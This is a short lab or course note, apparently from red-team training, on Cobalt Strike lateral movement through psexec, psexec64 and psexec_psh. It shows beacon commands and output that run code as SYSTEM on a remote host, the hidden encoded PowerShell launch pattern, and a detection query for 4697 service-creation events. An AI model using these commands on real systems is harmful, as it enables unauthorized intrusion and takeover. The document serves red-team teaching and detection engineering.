PsExec

The psexec / psexec64 commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM.

beacon> jump psexec64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (\\web\ADMIN$\768870c.exe)

Started service 768870c on web.dev.cyberbotic.io
[+] established link to child beacon: 10.10.122.30

\

\

A reliable way of searching for PsExec is by looking for 4697 service created events. These are often quite rare, unless a service comes with a software installation or something similar. Cobalt Strike generates a random 7-character alphanumeric string which it uses for both the service name and binary filename. When setting the binPath for the service, it uses a UNC path to the ADMIN$ share.

event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe

\

\

psexec_psh doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). The pattern it uses by default is %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ....

beacon> jump psexec_psh web smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web via Service Control Manager (PSH)

Started service bd119dd on web
[+] established link to child beacon: 10.10.122.30

\